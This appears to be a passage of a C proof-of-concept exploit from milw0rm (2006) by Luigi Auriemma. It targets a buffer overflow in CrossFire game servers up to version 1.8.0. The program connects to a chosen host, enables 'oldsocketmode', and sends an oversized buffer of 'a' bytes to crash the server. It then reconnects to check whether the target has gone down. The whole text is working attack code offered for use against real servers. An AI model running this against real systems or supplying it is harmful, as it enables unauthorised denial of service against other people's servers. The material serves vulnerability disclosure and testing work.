case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
#define VER "0.1"
#define PORT 13327
#define MAXSOCKBUF 10240
#define BUFFSZ (MAXSOCKBUF + 256)
int readline(int sd, u_char *data, int size);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
srand(time(NULL));
setbuf(stdout, NULL);
fputs("\n"
"CrossFire <= 1.8.0 oldsocketmode buffer-overflow "VER"\n"
"bug found by the developers and indipendently by me... but too late\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");
printf("- receive server version:\n");
len = readline(sd, buff, sizeof(buff));
if(len < 0) std_err();
printf(" %s\n", !buff[0] ? buff + 2 : buff);
printf("- activate oldsocketmode\n");
if(send(sd, "oldsocketmode", 13, 0)
< 0) std_err();
printf("- send %d bytes, the server supports max %d\n", sizeof(buff), MAXSOCKBUF);
memset(buff, 'a', sizeof(buff));
if(send(sd, buff, sizeof(buff), 0)
< 0) std_err();
len = readline(sd, buff, sizeof(buff));
sleep(ONESEC); // needed in my localhost server or it terminates!
close(sd);
printf("- check server:");
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server does not seem vulnerable\n\n");
}
close(sd);
return(0);
}
int readline(int sd, u_char *data, int size) {
int i;
size--;
for(i = 0; i < size; i++) {
if(recv(sd, data, 1, 0) <= 0) return(-1);
if(*data == '\n') break;
data++;
}
*data = 0;
return(i);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
// milw0rm.com [2006-02-27]